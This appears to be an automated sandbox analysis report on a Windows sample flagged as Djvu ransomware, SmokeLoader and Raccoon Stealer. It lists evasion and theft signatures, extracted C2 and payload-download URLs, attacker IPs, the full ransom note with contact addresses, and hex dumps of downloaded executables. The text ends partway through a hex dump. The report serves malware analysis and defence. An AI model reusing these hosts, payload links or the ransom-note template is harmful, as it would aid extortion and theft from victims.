Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 800784
MD5: 17a74a0281cefb5d9c29022fbc79981a
SHA1: d88585c6c9488b6d28b71dd0659edb8649e32dca
SHA256: 2814b2a02771e2d16ce2efb1586d8623b54b50d6e1c8dfa9ab2bbf54ab8b249d
Tags: exeRecordBreaker
Infos:

Detection

Djvu, Fabookie, Raccoon Stealer v2, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Yara detected Fabookie
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Machine Learning detection for sample
Injects a PE file into a foreign processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Detected VMProtect packer
Tries to steal Crypto Currency Wallets
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Connects to several IPs in different countries

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://xv.yxzgamen.com/2701.html URL Reputation: Label: malware
Source: https://xv.yxzgamen.com/logo.png URL Reputation: Label: malware
Source: http://77.73.134.27/llpb1133.exe URL Reputation: Label: malware
Source: http://bihsy.com/lancer/get.php Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\98D7.exe Avira: detection malicious, Label: HEUR/AGEN.1210601
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe Avira: detection malicious, Label: HEUR/AGEN.1210601
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Avira: detection malicious, Label: HEUR/AGEN.1234960
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 48%
Source: file.exe Virustotal: Detection: 34% Perma Link
Multi AV Scanner detection for domain / URL
Source: potunulit.org Virustotal: Detection: 16% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\3046.exe ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\4113.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\98D7.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\ECFB.exe ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\XandETC.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\db.dll ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\pliu.exe ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Roaming\sievwvt ReversingLabs: Detection: 48%
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\12C0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FB61.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\98D7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ECFB.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sievwvt Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3046.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jhevwvt Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4113.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Joe Sandbox ML: detected
Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://bihsy.com/files/1/build3.exe"], "C2 url": "http://bihsy.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-8pCGyFnOj6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0641JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Window
Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\4113.exe Unpacked PE file: 11.2.4113.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3046.exe Unpacked PE file: 15.2.3046.exe.400000.0.unpack
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 158.69.96.67:443 -> 192.168.2.3:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.253.35:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: Binary string: C:\pewuhagedisene88\fafi.pdb source: explorer.exe, 00000004.00000003.361183875.0000000005940000.00000004.00000001.00020000.00000000.sdmp, 4113.exe, 0000000B.00000000.360714654.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: C:\hukesonu\cab71\kedir\81\zu.pdb source: D8D3.exe, 00000013.00000000.402009575.0000000000401000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb` source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: eFI,d(C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\min gaferovasomo\kimi wipeyumamu16\jigewenege.pdb source: explorer.exe, 00000004.00000003.365557509.000000000B700000.00000004.00000001.00020000.00000000.sdmp, 3046.exe, 0000000D.00000002.396339058.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000D.00000000.364021519.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000F.00000000.394852843.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000021.00000000.447684089.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000021.00000002.509435765.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000002.603085985.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000000.461163499.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000027.00000002.514112881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000027.00000000.466448303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: 3JC:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: d:\administrator\desktop\apphttp\release\apphttp.pdb source: pliu.exe, 0000001B.00000000.437990419.000000000040E000.00000002.00000001.01000000.00000014.sdmp, pliu.exe, 0000001B.00000002.467843346.000000000040E000.00000002.00000001.01000000.00000014.sdmp
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00428390 FindFirstFileExW, 11_2_00428390

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 37.34.248.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: perficut.at
Source: C:\Windows\explorer.exe Domain query: potunulit.org
Source: C:\Windows\explorer.exe Network Connect: 190.219.54.242 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.106.124.133 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 195.158.3.162 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 158.69.96.67 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 77.73.134.27 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: flytourchip.com.br
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://bihsy.com/lancer/get.php
Source: Malware configuration extractor URLs: http://bulimu55t.net/
Source: Malware configuration extractor URLs: http://soryytlic4.net/
Source: Malware configuration extractor URLs: http://bukubuka1.net/
Source: Malware configuration extractor URLs: http://novanosa5org.org/
Source: Malware configuration extractor URLs: http://hujukui3.net/
Source: Malware configuration extractor URLs: http://newzelannd66.org/
Source: Malware configuration extractor URLs: http://golilopaster.org/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:44:50 GMTContent-Type: application/octet-streamContent-Length: 7722496Last-Modified: Tue, 07 Feb 2023 18:03:24 GMTConnection: keep-aliveETag: "63e2926c-75d600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c 92 e2 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 cc 75 00 00 08 00 00 00 00 00 00 9e ea 75 00 00 20 00 00 00 00 76 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 76 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 ea 75 00 53 00 00 00 00 00 76 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 76 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 ca 75 00 00 20 00 00 00 cc 75 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 04 00 00 00 00 76 00 00 06 00 00 00 ce 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 76 00 00 02 00 00 00 d4 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 ea 75 00 00 00 00 00 48 00 00 00 02 00 05 00 ec d4 75 00 5c 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 14 ad 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:25 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:48 GMTETag: "62548404-1f29b8"Expires: Tue, 07 Feb 2023 19:15:25 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:26 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:42 GMTETag: "625483fe-6db00"Expires: Tue, 07 Feb 2023 19:15:26 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:27 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 21:52:46 GMTETag: "629299ae-13900"Expires: Tue, 07 Feb 2023 19:15:26 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 